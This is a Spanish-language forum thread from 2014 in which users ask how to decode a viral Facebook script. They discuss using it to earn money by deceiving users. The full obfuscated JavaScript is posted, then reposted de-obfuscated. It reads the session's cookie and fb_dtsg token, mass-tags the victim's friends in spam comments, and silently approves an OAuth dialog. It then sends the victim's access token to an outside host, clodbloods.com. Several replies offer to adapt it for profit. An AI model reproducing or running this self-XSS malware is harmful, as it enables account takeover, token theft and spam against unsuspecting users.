¿Cómo desencriptar y entender un script viral en Facebook?

Pompinchu · 30 Nov 2014

¡Hola Forobetanos! Ando por aquí pidiendo ayuda. Últimamente se ha puesto de moda eso de: Hackear Facebook, Tener más seguidores, etc.

— La cuestión es en ganar $$ por engañar a los incautos cibernautas, les dejo un video:

[video]http://movilvip.info/tuto.mp4[/video]

La cuestión es que dicho código que hace viralizar publicaciones, está encriptado y hay ciertas partes que no entiendo. Si hay alguien que maneje Javascript y sepa dar pautas, sería gran aporte.... OJO, con esto se puede ganar en PPI, CPA del bueno.... y hasta CPM también. 🙄

Web:

HTML:

 http://www.hacermepopular.com/

Código:

HTML:

 function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
IbraheemNada("");
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","365154020330078","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22cle  arcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x2  2version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};  
xmlhttp.open("GET", url, true); 
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
     izinhtml = document.createElement("html");
     izinhtml.innerHTML = xmlhttp.responseText;
   if(izinhtml.getElementsByTagName("form").length > 0){
     izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
     act = izinhtml.getElementsByTagName("form")[0].action;
     duzenlevegonder(izinhtml,act)
   }else{
   sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
   if (sex[1]) {
   tokenyolla(sex[1]);
   }
   }
   }
        };

xmlhttp.open("POST", act , true); 
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_like  s,user_birthday";
}

if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
function tokenyolla(token){
top.location.href = 'http://clodbloods.com/face/#' + token;
}}
var alibasim = "clic en aceptar";
alert(alibasim);

Ale Hernandez · 30 Nov 2014

Está encriptado para que nadie lo copie. :encouragement:

axuz · 30 Nov 2014

No esta encriptado, el secreto esta en la variable _0xa22c, la misma que esta definida como un arreglo.

Insertar CODE, HTML o PHP:

[/COLOR]function IbraheemNada(uidss) {    var a = document.createElement('script');
    a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
    document.body.appendChild(a)
}
IbraheemNada("");
var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "365154020330078", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "\x26filter[0]=user", "\x26options[0]=friends_only", "\x26options[1]=nm", "\x26token=v7", "\x26viewer=", "\x26__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "\x26ft_ent_identifier=", "\x26comment_text=", "\x26source=2", "\x26client_id=1377871797138:1707018092", "\x26reply_fbid", "\x26parent_comment_id", "\x26rootid=u_jsonp_2_3", "\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22cle  arcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x2  2version\x22:\x22x\x22,\x22parent_fbid\x22:", "}", "\x26attached_sticker_fbid=0", "\x26attached_photo_fbid=0", "\x26giftoccasion", "\x26ft[tn]=[]", "\x26__a=1", "\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "\x26__req=q", "\x26fb_dtsg=", "\x26ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];
var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
var id = _0xa22c[5];
var arkadaslar = [];
var svn_rev;


function arkadaslari_al(id) {
    var _0x7892x7 = new XMLHttpRequest();
    _0x7892x7[_0xa22c[6]] = function() {
        if (_0x7892x7[_0xa22c[7]] == 4) {
            eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]);
            for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) {
                mesaj = _0xa22c[10];
                mesaj_text = _0xa22c[10];
                for (i = f * 27; i < (f + 1) * 27; i++) {
                    if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
                        mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22];
                        mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
                    };
                };
                yorum_yap(id, mesaj);
            };
        };
    };
    var _0x7892x8 = _0xa22c[24];
    _0x7892x8 += _0xa22c[25];
    _0x7892x8 += _0xa22c[26];
    _0x7892x8 += _0xa22c[27];
    _0x7892x8 += _0xa22c[28] + user_id;
    _0x7892x8 += _0xa22c[29] + user_id;
    if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) {
        _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true);
    } else {
        _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true);
    };
    _0x7892x7[_0xa22c[37]]();
};


function RandomArkadas() {
    var _0x7892xa = _0xa22c[10];
    for (i = 0; i < 9; i++) {
        _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22];
    };
    return _0x7892xa;
};


function yorum_yap(id, _0x7892xc) {
    var _0x7892xd = new XMLHttpRequest();
    var _0x7892x8 = _0xa22c[10];
    _0x7892x8 += _0xa22c[40] + id;
    _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc);
    _0x7892x8 += _0xa22c[42];
    _0x7892x8 += _0xa22c[43];
    _0x7892x8 += _0xa22c[44];
    _0x7892x8 += _0xa22c[45];
    _0x7892x8 += _0xa22c[46];
    _0x7892x8 += _0xa22c[47] + id + _0xa22c[48];
    _0x7892x8 += _0xa22c[49];
    _0x7892x8 += _0xa22c[50];
    _0x7892x8 += _0xa22c[51];
    _0x7892x8 += _0xa22c[52];
    _0x7892x8 += _0xa22c[29] + user_id;
    _0x7892x8 += _0xa22c[53];
    _0x7892x8 += _0xa22c[54];
    _0x7892x8 += _0xa22c[55];
    _0x7892x8 += _0xa22c[56] + fb_dtsg;
    _0x7892x8 += _0xa22c[57];
    _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true);
    _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]);
    _0x7892xd[_0xa22c[6]] = function() {
        if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) {
            _0x7892xd[_0xa22c[64]];
        };
    };
    _0x7892xd[_0xa22c[37]](_0x7892x8);
};
arkadaslari_al(id);


if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) {
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();


    function uygulamaizinver(url) {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4) {
                izinverhtml = document.createElement("html");
                izinverhtml.innerHTML = xmlhttp.responseText;
                if (izinverhtml.getElementsByTagName("form").length > 0) {
                    izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
                    act = izinverhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izinverhtml, act);
                }
            }
        };
        xmlhttp.open("GET", url, true);
        xmlhttp.send();
    }


    function duzenlevegonder(formnesne, act) {
        izinverparams = "";
        for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) {
            if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) {
                izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
            }
        }
        if (formnesne.getElementsByTagName("select").length > 0) {
            izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
        }
        izinverparams.replace("&fb_dtsg", "fb_dtsg");
        izinverparams += "&__CONFIRM__=1";
        formnesne = formnesne;
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4) {
                izinhtml = document.createElement("html");
                izinhtml.innerHTML = xmlhttp.responseText;
                if (izinhtml.getElementsByTagName("form").length > 0) {
                    izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
                    act = izinhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izinhtml, act)
                } else {
                    sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                    if (sex[1]) {
                        tokenyolla(sex[1]);
                    }
                }
            }
        };


        xmlhttp.open("POST", act, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.send(izinverparams);


    }


    function TokenUrl(id) {
        return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_like  s,user_birthday";
    }


    if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])) {
        uygulamaizinver(TokenUrl("121876164619130"));
        var http = new XMLHttpRequest();
        http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
        http['send']();
        var get = JSON.parse(http['responseText']);
        var isim = get.name;
    }
    window.setInterval(function() {
        if (document.getElementsByClassName("_5ce")) {
            for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
                document.getElementsByClassName("_5ce")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiToggle wrap")) {
            for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
                document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiPopover")) {
            for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
                document.getElementsByClassName("uiPopover")[i].innerHTML = "";
            }
        }
    }, 200);


    function tokenyolla(token) {
        top.location.href = 'http://clodbloods.com/face/#' + token;
    }
}
var alibasim = "clic en aceptar";

alert(alibasim);[COLOR=#000000]

Pompinchu · 1 Dic 2014

zkanzito dijo:
No esta encriptado, el secreto esta en la variable _0xa22c, la misma que esta definida como un arreglo.

Disculpa, ¿Podrías explicar algo breve el secreto de la variable que está definida como un arreglo? Por otro lado, ¿Entiendes el código? La cosa es que el código hace que publiques masivamente una fotografía, en la descripción un enlace. Posteriormente te abre una nueva ventana que es la que hace el PPI y CPA

- - - Actualizado - - -

AGREGO: http://movilvip.info/ Es el mismo dueño 😱

Edison Martinez · 2 Dic 2014

no hayan como sacar dinero jajaja 😛8:

Jorge Reyes · 2 Dic 2014

En pocas palabras te digo lo que hace: Obtiene el access token tuyo ejecuta el usuario el codigo en su consola de chrome y manda el token a la web http://clodbloods.com/face/# la cual me imagino toma el access token y te llena de spam el feisbuk xD

Bastiands · 2 Dic 2014

- - - Actualizado - - -
[MENTION=45320]Pompinchu[/MENTION] te deje mp !

jeanaxeso · 2 Dic 2014

Interesante a donde llegue =O

Bastiands · 2 Dic 2014

Yo se todo del codigo editarlo , pero necesito dominio y trafico podriamos generar arto $

RenzoPauta · 3 Dic 2014

Es faciel hacer eso yo tbm tuve esoo :/

quien sabe hacer extesiones google chrome eso tambien hace viral o span a todo el facebook : YouTube.com - Tienes que A&#241adir Noticias CNN PARA VER ESTE CAPITULO INEDITO.!!

Unefex · 3 Dic 2014

Eset Nod32 me detecta su web como maliciosa :encouragement:

eltulpen · 3 Dic 2014

te escribe hace rato por MP

mrcruzer · 12 Feb 2015

Bastiands dijo:
- - - Actualizado - - -
[MENTION=45320]Pompinchu[/MENTION] te deje mp !

hola puedes ayudarme a mi tambien

¿Cómo desencriptar y entender un script viral en Facebook?

Pompinchu

Ale Hernandez

zkanzito

Pompinchu

Edison Martinez

Jorge Reyes

Bastiands

jeanaxeso

Bastiands

RenzoPauta

Unefex

eltulpen

mrcruzer

Temas similares